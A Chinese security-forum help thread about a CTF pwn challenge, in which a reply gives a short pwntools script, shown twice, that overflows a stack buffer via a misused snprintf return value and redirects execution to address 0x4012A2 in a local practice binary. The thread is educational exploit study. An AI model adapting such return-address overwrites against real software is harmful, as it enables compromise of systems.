应该是栈溢出,但是栈结构非常奇怪,各位大佬帮忙看下~~
[培训]《冰与火的战歌:Windows内核攻防实战》!从零到实战,融合AI与Windows内核攻防全技术栈,打造具备自动化能力的内核开发高手。
---
来源: 看雪论坛
原文链接: https://bbs.kanxue.com/thread-290208.htm
[求助]一道pwn题,求帮忙~~
72 浏览
3 回复
from pwn import*
p=process('./sp')
payload=b'a'*(0x118-11-4)
p.send(payload)
payload=p64(0x4012A2)
#gdb.attach(p)
#pause()
p.send(payload)
p.interactive()
snprintf返回值考察问题导致的索引溢出
p=process('./sp')
payload=b'a'*(0x118-11-4)
p.send(payload)
payload=p64(0x4012A2)
#gdb.attach(p)
#pause()
p.send(payload)
p.interactive()
snprintf返回值考察问题导致的索引溢出
不错啊这题,考察动态调试,我拿去给我们新生练习了
懂了懂了,snprintf的返回值不以限定的长度为准,而是以实际输入的长度为准,返回值可能大于限定的长度,从而第二次snprintf的索引直接到[rbp+8],学到了,谢谢大佬
最后于 2026-3-11 21:52
被mb_dxsbxhbd编辑
,原因:
最后于 2026-3-11 21:52
被mb_dxsbxhbd编辑
,原因: